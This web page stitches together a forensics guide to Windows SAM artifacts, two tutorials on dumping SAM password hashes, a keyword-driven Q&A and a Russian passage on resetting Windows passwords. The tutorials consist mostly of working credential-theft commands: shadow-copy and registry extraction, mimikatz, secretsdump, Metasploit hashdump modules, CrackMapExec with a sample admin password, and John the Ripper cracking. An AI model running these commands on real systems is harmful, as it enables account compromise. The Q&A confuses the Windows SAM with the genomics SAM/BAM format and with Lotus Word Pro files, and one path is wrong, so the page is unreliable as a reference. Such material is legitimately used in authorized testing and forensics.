Authentications SAM Artifacts
-
Purpose of SAM File: The Security Account Manager (SAM) file in Windows systems stores user accounts and security descriptors.
-
Location: SAM file is located at
C:\Windows\config\SAM. -
Structure: SAM file is a registry hive, containing keys and values.
-
Digital Forensics Value: Provides detailed information about user accounts, crucial for tying a user to system activities.
-
Access to SAM File: Ensure proper permissions and methods are used to access and analyze the SAM file.
-
Data Integrity: Maintain the integrity of the original SAM file to prevent contamination of evidence.
-
Cryptographic Protection: Understand the cryptographic measures used in SAM to accurately interpret the data.
Windows stores user accounts and security descriptors in the SAM file, a critical component of a system-defined database for configuration data storage and retrieval. This file plays a key role in authenticating local and remote users, ensuring system security against unauthenticated access.
Digital Forensics Value of User Accounts Artifacts
User Accounts artifacts are invaluable in forensic investigations to identify system users. This information includes:
-
Login History (Successful and Failed Attempts)
Analyzing these artifacts helps in establishing a timeline and associating specific users with activities on the computer.
-
Location:
C:\Windows\config\SAM -
SAM Hive Path:
SAM\Domains\Accounts\Users -
Structure: The SAM file is a registry hive with keys and subkeys, viewable and editable through
regedit.exe.
Analyzing with ArtiFast Windows
ArtiFast Windows facilitates the extraction and analysis of User Accounts artifacts from Windows machines.
-
Accessing the File System:
-
You need physical or remote access to the file system of the Windows host.
-
If you have direct physical access, you might use a bootable USB drive with a forensics environment to access the file system without booting into Windows.
-
For remote access, you might use administrative shares or remote desktop with administrative privileges.
-
-
Locating the SAM File:
-
The SAM file is located in
C:\Windows\System32\config\SAMon the target Windows system. -
This file is locked by the operating system when Windows is running. To access it, you have to either boot from a different OS (like a forensics live USB) or use a tool that can read locked files.
-
Using Volume Shadow Copy:
-
If you cannot directly access the file due to it being in use, consider using the Volume Shadow Copy Service (VSS).
-
You can create a new shadow copy and access the SAM file from there. Tools like
vssadmincan be used to create and manage shadow copies.
-
-
-
-
Extracting the SAM File:
-
Once you have access to the SAM file, you need to copy it to your analysis environment.
-
Make sure to follow proper evidence handling procedures to maintain the integrity of the data, like maintaining a chain of custody and using write blockers if working with physical drives.
-
-
Create a Case: Initialize your investigation with a new case.
-
Add Evidence: Include the SAM file as part of your evidence.
-
Artifact Selection: Choose User Accounts artifact for analysis.
-
Review Artifacts: Utilize «Artifact View» or «Timeline View» for detailed examination.
-
User Accounts Artifact in ArtiFast
-
Username: Account identifier.
-
Full Name: User’s full name.
-
User Comment: Any comments associated with the user account.
-
Profile Path: Location of the user’s profile folder.
-
Account Type: Category of the user account (e.g., admin, guest).
-
Account Status: Current status (active, inactive, password requirements).
-
Login Count: Frequency of user logins.
-
Last Login Date/Time: Most recent login timestamp.
-
Last Password Reset Date/Time: Timestamp of the last password reset.
-
Last Password Failed Date/Time: Timestamp of the most recent failed login attempt.
-
Logon Script: Scripts executed during user login.
-
Last Write Date/Time: Timestamp of the last modification to the user’s registry key.
Investigating User Accounts through the SAM file provides essential insights into user activities and system access patterns. This analysis is crucial for comprehensive digital forensics investigations in Windows environments.
Introduction to SAM
Local Windows credentials are stored in the Security Account Manager (SAM) database as password hashes using the NTLM hashing format, which is based on the MD4 algorithm.
We can reuse acquired NTLM hashes to authenticate to a different machine, as long as the hash is tied to a user account and password registered on that machine
It is the responsibility of LSA (Local Security Authority) to verify user login by matching the passwords with the database maintained in SAM.
SAM starts running in the background as soon as the Windows boots up.
located at C:\Windows\System32\config\SAM
but the SYSTEM process has an exclusive lock on it, preventing us from reading or copying it even from an administrative command prompt
Failure to copy the SAM database
copy c:\Windows\System32\config\sam C:\Users\nored0x\Downloads\sam
There are two potential workarounds.
- First, we could use the Volume Shadow Copy Server, which can create a snapshot (or “shadow volume”) of the local hard drive with vssadmin,
- The second approach, which will work on our Windows 10 machine, is to execute this option through WMIC launched from an administrative command prompt.
Specifically, we’ll launch wmic, specify the shadowcopy class, create a new shadow volume and specify the source drive with “Volume=‘C:\’”. This will create a snapshot of the C drive.
Creating a shadow volume
wmic shadowcopy call create Volume='C:\'
Listing shadow volumes
Shadow copying the SAM database
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\system32\config\sam C:\users\nored0x\Downloads\sam
The encryption keys are stored in the SYSTEM file, which is in the same folder as the SAM database. However, it is also locked by the SYSTEM account
Shadow copying the SYSTEM file
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\system32\config\system C:\users\nored0x\Downloads\system
registry
We can also obtain a copy of the SAM database and SYSTEM files from the registry in the HKLM\sam and HKLM\system hives, respectively. Administrative permissions are required to read and copy
reg save HKLM\sam C:\users\nored0x\Downloads\sam
reg save HKLM\system C:\users\nored0x\Desktop\system
samdump2
pwdump7
This tool extracts the SAM file from the system and dumps its credentials
download :https://www.tarasco.org/security/pwdump_7/pwdump7.zip
windws7
windows10
Invoke-PowerDump.ps1
download:https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-PowerDump.ps1
Import-Module .\Invoke-PowerDump.ps1
Invoke-PowerDump
creddump7
sudo apt install python-crypto #if didn't work | error in kali2021
wget https://ftp.dlitz.net/pub/dlitz/crypto/pycrypto/pycrypto-2.6.1.tar.gz
tar -xvzf pycrypto-2.6.1.tar.gz
cd pycrypto-2.6.1
python setup.py build
sudo python setup.py build instal
sudo git clone https://github.com/Neohapsis/creddump7
python pwdump.py /home/kali/system /home/kali/sam
impacket
Impacket tool can also extract all the hashes for you from the SAM file
impacket-secretsdump -system SYSTEM -sam SAM local
Mimikatz
privilege::debug
token::elevate ##allowing mimikatz to access the SAM file
lsadump::sam
The hashdump post module will dump the contents of the SAM database.
use post/windows/gather/credentials/credential_collector
set session n
exploit
Kiwi extension to perform various types of credential-oriented operations, such as dumping passwords and hashes, dumping passwords in memory, generating golden tickets, and much more
Decrypting Hash
John The Ripper
sudo john hash -w=/usr/share/wordlists/rockyou.txt --format=NT
I finished part 1 in Windows Credentials today waite me in the next part.
The Security Account Manager (SAM) is a database file in Windows XP, Windows Vista, Windows 7, 8.1 and 10 that stores users’ passwords. It can be used to authenticate local and remote users. SAM uses cryptographic measures to prevent unauthenticated users accessing the system.
What happens if you delete SAM file?
If the SAM is somehow deleted in some way while Windows is running, the system loses all user account passwords, resulting in Windows throwing an error exception (Blue Screen) and shutting down.
The Security Account Manager (SAM) is a database that is present on computers running Windows operating systems that stores user accounts and security descriptors for users on the local computer.
What is the SAM registry file?
Windows Security Accounts Manager (SAM) is a registry file which stores passwords in a hashed format.
Where is the Windows SAM file?
These hashes are stored in the Windows SAM file. This file is located on your system at C:\Windows\System32\config but is not accessible while the operating system is booted up.
What does a SAM file look like?
SAM files are TSV (tab-separated-values) files and begin with an optional header. The header consists of multiple lines, starting with an ‘@’ character, each line is a record. Each record starts with its identifier and is followed by tab-separated tags. There also are other header record types.
What is Sam backup?
A SAM backup saves a record of the entire database at a given moment. These system backups should ideally be saved onto portable media and stored off-site. Using third-party backup software requires stopping the ScholasticMySQL and ScholasticJBoss services for the duration of the backup.
Where is Sam database located?
The SAM database is stored in two places within Windows: %systemroot%\system32\config\sam is the location of the main storage for passwords and %systemroot%\repair\sam.
How do I find hidden passwords on my computer?
Go the Security tab and click the Saved Passwords button. You’ll see a list of website addresses and usernames. Click the Show Passwords button to see your passwords.
How do I open a SAM file?
sam extension can be opened and viewed using IBM Lotus Word Pro, and Microsoft Word 2010 can also be used to do this, though the Microsoft Office Converter Pack should be installed.
What is a SAM registry hive?
The Security Account Manager (SAM) is a particular registry hive that stores credentials and account information for local users. User passwords are stored in a hashed format in the SAM registry hive either as an LM hash or an NT hash, depending on Group Policy settings.
Can I delete Ntuser DAT files?
You shouldn’t ever delete your NTUSER. DAT file. Because Windows depends on it to load your settings and preferences, removing it would corrupt your user profile. When you next log in, you’ll see a prompt that Windows can’t sign into your account.
Does Chntpw work on Windows 10?
chntpw is a software utility for resetting or blanking local passwords used by Windows NT, 2000, XP, Vista, 7, 8, 8.1 and 10. It does this by editing the SAM database where Windows stores password hashes.
Why does pass the hash work?
PtH attacks exploit the authentication protocol, as the passwords hash remains static for every session until the password is rotated. Attackers commonly obtain hashes by scraping a system’s active memory and other techniques.
What is the difference between a SAM file and a BAM file?
SAM files are human-readable text files, and BAM files are simply their binary equivalent, whilst CRAM files are a restructured column-oriented binary container format. BAM files are typically compressed and more efficient for software to work with than SAM.
How do I convert a SAM file to a BAM file?
To convert SAM to BAM, we use the samtools view command. We must specify that our input is in SAM format (by default it expects BAM) using the -S option. We must also say that we want the output to be BAM (by default it produces BAM) with the -b option.
How is a SAM file generated?
Most often it is generated as a human readable version of its sister BAM format, which stores the same data in a compressed, indexed, binary form. Currently, most SAM format data is output from aligners that read FASTQ files and assign the sequences to a position with respect to a known reference genome.
What is samdump2?
This tool is designed to dump Windows 2k/NT/XP password hashes from a SAM file, using the syskey bootkey from the system hive. Syskey is a Windows feature that adds an additional encryption layer to the password hashes stored in the SAM database. Nov 26, 2021.
What does the Security Account Manager Sam contains?
The Security Accounts Manager (SAM) is a database in the Windows operating system (OS) that contains user names and passwords. SAM is part of the registry and can be found on the hard disk. In the SAM, each user account can be assigned a local area network (LAN) password and a Windows password. Both are encrypted.
Where is the SAMS database on a domain controller?
Can you tell me where the Windows NT 4.0 security database (also known as the SAM database) is located on a domain controller (DC)? The SAM database is part of the registry. It’s stored in the HKEY_LOCAL_MACHINE\SECURITY\SAM subkey and duplicated to the HKEY_LOCAL_MACHINE\SAM subkey.
What is the file location for registry keys for Sam security software and system?
The main, core system Registry hive files (specifically, SAM, Security, Software, and System) can be found in the Windows\system32\config folder, as illustrated in Fig. 1.3.
How can I reveal never saved passwords on Chrome?
Click on the Chrome Menu (three dots upper right corner), select “Settings”. Then find “Passwords”under Äutofil section. At the very bottom of the page is your “Never Saved “passwords”.
Where are my Chrome passwords stored?
Check your saved passwords On your computer, open Chrome. At the top, click More Settings. Select Passwords Check passwords.
What is the best password in the world?
Here are the main traits of a reliable, secure password: At least 12 characters long (the longer, the better). Has a combination of upper and lowercase letters, numbers, punctuation, and special symbols. Random and unique.
How do I open a Amipro file?
How to open file with AMIPRO extension? Download and install Lotus Word Pro. Check the version of Lotus Word Pro and update if needed. Assign Lotus Word Pro to AMIPRO files. Verify that the AMIPRO is not faulty.
What are BAM files?
A BAM file (. bam) is the binary version of a SAM file. A SAM file (. sam) is a tab-delimited text file that contains sequence alignment data. Indexing: IGV requires that both SAM and BAM files be sorted by position and indexed, and that the index files follow a specific naming convention.
What is the full path of the directory on Windows 10 containing the SAM registry hive file?
Registry hives are located in the Windows\System32\Config folder. That is, for instance, if Windows is installed on drive “C,” you can find Registry hives by navigating to C:\Windows\System32\Config folder.
How do I extract registry hives?
Exporting registry hives from a live system execute the “reg save <hive> <file>” command; call the RegSaveKeyEx/RegSaveKey routine from an acquisition tool; copy a hive file from an existing shadow copy; copy a hive file from a newly created shadow copy; directly read a hive file from an NTFS volume.
Why does Windows automatically back up the registry?
The Windows operating system automatically saves the registry, every time a system restore point is created – whether automatically or manually by you. This is useful, because when you restore your computer to a prior point, the OS needs the old registry backup too, in order to create a working restored computer.
In this article, we will learn about SAM. We will learn about the passwords and how they are stored in the SAM. We will also focus on the NTLM Authentication. At last, we will be using a bunch of different tools to extract those credentials from SAM.
Table of Content
- Introduction to SAM
- How passwords are stored?
- LM Authentication
- NTLM Authentication
- Windows 7
- PwDump7
- SamDump2
- Metasploit Framework
- Invoke-PowerDump.ps1
- Get-PassHashes.ps1
- PowerShell
- Powerdump Manual
- Windows 10
- Mimikatz
- Impacket
- Metasploit Framework
- HashDump
- Credential_collector
- Load_kiwi (Mimikatz)
- Koadic
- PowerShell Empire
- Mimikatz/sam
- LaZagne
- CrackMapExec
- Decrypting Hash
- John The Ripper
Introduction to SAM
SAM is short for the Security Account Manager which manages all the user accounts and their passwords. It acts as a database. All the passwords are hashed and then stored SAM. It is the responsibility of LSA (Local Security Authority) to verify user login by matching the passwords with the database maintained in SAM. SAM starts running in the background as soon as the Windows boots up. SAM is found in C:\Windows\System32\config and passwords that are hashed and saved in SAM can found in the registry, just open the Registry Editor and navigate yourself to HKEY_LOCAL_MACHINE\SAM.
How are Passwords stored in Windows?
To know how passwords are saved in windows, we will first need to understand what are LM, NTLM v1 & v2, Kerberos.
LM authentication
LAN Manager (LM) authentication was developed by IBM for Microsoft’s Windows Operating Systems. The security it provides is considered hackable today. It converts your password into a hash by breaking it into two chunks of seven characters each. And then further encrypting each chunk. It is not case sensitive either, which is a huge drawback. This method coverts the whole password string into uppercase, so when the attacker is applying any attack like brute force or dictionary; they can altogether avoid the possibility of lowercase. The key it is using to encrypt is 56-bit DES which now can be easily cracked.
NTLM authentication
NTLM authentication was developed to secure the systems as LM proved to be insecure at the time. NTLM’s base is a challenge-response mechanism. It uses three components – nonce (challenge), response and authentication.
When any password is stored in Windows, NTLM starts working by encrypting the password and storing the hash of the said password while it disposes of the actual password. And it further sends the username to the server, then the server creates a 16-byte random numeric string, namely nonce and sends it to the client. Now, the client will encrypt the nonce using the hash string of the password and send the result back to the server. This process is called a response. These three components (nonce, username, and response) will be sent to Domain Controller. The Domain Controller will recover the password using hash from the Security Account Manager (SAM) database. Furthermore, the domain controller will check the nonce and response in case they match, Authentication turns out to be successful.
Working of NTLM v1 and NTML v2 is the same, although there are few differences such as NTML v1 is MD4 and v2 is MD5 and in v1 C/R Length is 56 bits + 56-bit +16 bit while v2 uses 128 bits. When it comes to C/R Algorithm v1 uses DES (ECB mode) and v2 is HMAC_MD5. and lastly, in v1 C/R Value Length 64 bit + 64 bit + 64 bit and v2 uses 128 bits.
Now as we have understood these hashing systems, let’s focus on how to dump them. The methods we will focus on are best suited for both internal and external pen-testing. Let’s begin!
NOTE: Microsoft changed the algorithm on Windows 10 v1607 which replaced the RC4 cipher with AES. This change made all the extraction tools that directly access SAM to dump hashes obsolete. Some of the tools have been updated and handle the new encryption method properly. But others were not able to keep up. This doesn’t mean that they cannot be used anymore. This just means that if we face the latest Windows 10, we rather use update tools. Hence we divided this article into 2 parts. Windows 7 and Windows 10.
Windows 7
PwDump7
This tool is developed by Tarasco and you can download it from here. This tool extracts the SAM file from the system and dumps its credentials. To execute this tool just run the following command in command prompt after downloading:
PwDump7.exe
And as a result, it will dump all the hashes stored in SAM file as shown in the image above.
Now, we will save the registry values of the SAM file and system file in a file in the system by using the following commands:
reg save hklm\sam c:\sam reg save hklm\system c:\system
We saved the values with the above command to retrieve the data from the SAM file.
SamDump2
Once you have retrieved the data from SAM, you can use SamDump2 tool to dump its hashes with the following command:
samdump2 system sam
Metasploit Framework: Invoke-Powerdump.ps1
Download Invoke-Powerdump Script
The method of Metasploit involves PowerShell. After getting the meterpreter session, access windows PowerShell by using the command load PowerShell. And then use the following set of commands to run the Invoke-PowerDump.ps1 script.
powershell_import /root/powershell/Invoke-PowerDump.ps1 powershell_execute Invoke-PowerDump
Once the above commands execute the script, you will have the dumped passwords just as in the image above.
Metasploit Framework: Get-PassHashes.ps1
Download Get-PassHashes Script
Again, via meterpreter, access the windows PowerShell using the command load PowerShell. And just like in the previous method, use the following commands to execute the scripts to retrieve the passwords.
powershell_import /root/powershell/Get-PassHashes.ps1 powershell_execute Get-PassHashes
And VOILA! All the passwords have been retrieved.
PowerShell
Download Invoke-Powerdump Script
This method is an excellent one for local testing, AKA internal testing. To use this method, simply type the following in the Powershell:
Import-Module <'path of the powerdump script'>- Invoke-PowerDump
And, it will dump all the credentials for you.
NOTE: These were the tools that will only work on Windows 7. Now let’s take a look at the tools that work on Windows 10. The tools that work on Windows 10 can also work on Windows 7 but not vice-versa. The tools mentioned above work only on Windows 7. Even if they run on Windows 10 and give the hash, that hash will not be accurate and will not work and/or crack.
Windows 10
Mimikatz
There is a good enough method to dump the hashes of SAM file using mimikatz. The method is pretty easy and best suited for internal penetration testing. In one of our previous article, we have covered mimikatz, read that article click here. So in this method, we will use token::elevate command. This command is responsible for allowing mimikatz to access the SAM file in order to dump hashes. Now, to use this method use the following set of commands:
privilege::debug token::elevate lsadump::sam
Impacket
Impacket tool can also extract all the hashes for you from the SAM file with the following command:
./secretsdump.py -sam /root/Desktop/sam -system /root/Desktop/system LOCAL
Metasploit Framework: HashDump
When you have a meterpreter session of a target, just run hashdump command and it will dump all the hashes from SAM file of the target system. The same is shown in the image below:
Another way to dump hashes through hashdump module is through a post exploit that Metasploit offers. To use the said exploit, use the following set of commands:
use post/windows/gather/hashdump set session 1 exploit
Metasploit Framework: credential_collector
Another way to dump credentials by using Metasploit is via another in-built post exploit. To use this exploit, simply background your session and run the following command:
use post/windows/gather/credential/credential_collector set session 1 exploit
Metasploit Framework: load kiwi
The next method that Metasploit offers are by firing up the mimikatz module. To load mimikatz, use the load kiwi command and then use the following command to dump the whole SAM file using mimikatz.
lsa_dump_sam
Hence, you have your passwords as you can see in the image above.
Koadic
Once you have the session by Koadic C2, use the hashdump_sam module to get passwords as shown below:
use hashdump_sam execute
All the hashes from the SAM file will be dumped as shown in the above image.
Powershell Empire: mimikatz/sam
Once you have the session through the empire, interact with the session and use the mimikatz/sam module to dump the credentials with help of following commands:
usemodule credentials/mimikatz/sam execute
This exploit will run mimikatz and will get you all the passwords you desire by dumping SAM file.
LaZAgne
LaZage is an amazing tool for dumping all kinds of passwords. We have dedicatedly covered LaZagne in our previous article. To visit the said article, click here. Now, to dump SAM hashes with LaZagne, just use the following command:
lazagne.exe all
Yay!!! All the credentials have been dumped.
CrackMapExec
CrackMapExec is a really sleek tool that can be installed with a simple apt install and it runs very swiftly. Using CrackMapExec we can dump the hashes in the SAM very quicly and easily. It requires a bunch of things.
Requirements:
Username: Administrator
Password: Ignite@987
IP Address: 192.168.1.105
Syntax: crackmapexec smb [IP Address] -u ‘[Username]’ -p ‘[Password]’ –sam
crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --sam
Read More: Lateral Moment on Active Directory: CrackMapExec
Decrypting Hash: John The Ripper
John The Ripper is an amazing hash cracking tool. We have dedicated two articles on this tool. To learn more about John The Ripper, click here – part 1, part 2. Once you have dumped all the hashes from SAM file by using any of method given above, then you just need John The Ripper tool to crack the hashes by using the following command:
john –format=NT hash –show
And as you can see, it will reveal the password by cracking the given hash.
The article focuses on dumping credentials from the windows SAM file. Various methods have been shown using multiple platforms to successfully dump the credentials. To secure yourself you first must learn how a vulnerability can be exploited and to what extent. Therefore, such knowing such methods and what they can do is important.
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here
До
сих пор мы рассматривали процесс
восстановления паролей по известным
хэш-функциям, но не ответили на самый
главный вопрос: где эти хэш-функции
паролей хранятся и каким образом можно
получить доступ к базе учетных записей
пользователей? Все учетные записи
пользователей вместе с соответствующими
им хэш-функциями паролей хранятся в так
называемой базе SAM (Security Accounts Manager). Она
представляет собой одноименный файл,
который не имеет расширения. SAM-файл
является составной частью реестра и
хранится в каталоге %systemroot%\system32\config
(под %systemroot% понимается каталог с
операционной системой — по умолчанию
соответствует каталогу C:\WINDOWS). Кроме
того, резервная копия этого файла имеется
на диске аварийного восстановления
системы, а также в каталоге
%systemroot%\repair. Однако при использовании
резервной копии SAM-файла необходимо
иметь в виду, что пароли могли измениться
с момента последнего сеанса создания
резервной копии. Кроме того, недавно
заведенных учетных записей пользователей
в резервной копии может и не оказаться.
Практические примеры
Говоря
о паролях и получении доступа к ПК,
необходимо рассмотреть два принципиально
разных сценария: первый — это получение
доступа к отдельному ПК, который не
входит в локальную сеть, а второй —
получение доступа к ПК в составе локальной
сети, то есть получение сетевого доступа.
При этом под локальной сетью мы будем
в дальнейшем понимать полноценную сеть
с выделенным контроллером домена.
С
программной точки зрения способы
получения доступа к локальному и сетевому
ПК ничем не отличаются друг от друга.
Разница заключается лишь в способе
получения SAM-файла, который в первом
случае хранится на локальном ПК, а во
втором — на контроллере домена сети.
Кроме
того, доступ к ПК можно реализовать за
счет как сброса пароля, так и его подбора.
Причем порядок действий различен,
поэтому мы детально рассмотрим оба
способа сброса.
Сброс пароля Windows
Как
уже отмечалось в первой части статьи,
существует два типа паролей: локальные
и сетевые. Хэш-функции локальных паролей
хранятся на самом ПК, а хэш-функции
сетевых паролей — на контроллере домена.
Поскольку процедура сброса пароля
подразумевает редактирование SAM-файла,
что принципиально невозможно реализовать
удаленно (то есть по сети), и требует
перезагрузки ПК, то сброс пароля
используется преимущественно для
получения доступа к локальному ПК. Если
же требуется сбросить именно сетевой
пароль пользователя, а администраторский
сетевой пароль утерян, то ту же самую
процедуру придется проделать для
сетевого контроллера домена, но нужно
понимать, что для этого необходимо иметь
физический доступ к серверу и процедура
его остановки и перезагрузки не останется
незамеченной.
Для
сброса пароля необходимо внести изменения
в SAM-файл, который хранится в директории
%systemroot%\system32\config. Однако при загруженной
операционной системе доступ к этому
файлу заблокирован, то есть его невозможно
ни скопировать, ни просмотреть, ни
подменить. Поэтому для получения доступа
к SAM-файлу прежде всего необходимо
загрузить компьютер не с жесткого диска,
а с дискеты, компакт-диска или с флэш-памяти
с использованием другой операционной
системы.
При
этом если на жестком диске компьютера
установлена файловая система NTFS, то
необходимо, чтобы загрузочная операционная
система понимала ее. К примеру, можно
подготовить системную дискету DOS и
разместить на ней драйвер NTFS, называемый
NTFSDOS. C помощью этого драйвера все разделы
NTFS будут смонтированы в качестве
логических дисков DOS, после чего доступ
к ним станет возможным.
Кроме
того, нам понадобится утилита, позволяющая
производить изменения в SAM-файле. Сегодня
наиболее популярными из подобных утилит
являются две: Active Password Changer 3.0 и Offline
NT/2K/XP Password Changer & Registry Editor.
Соседние файлы в предмете [НЕСОРТИРОВАННОЕ]
- #
- #
- #
- #
- #
- #
- #
- #
- #
- #
- #
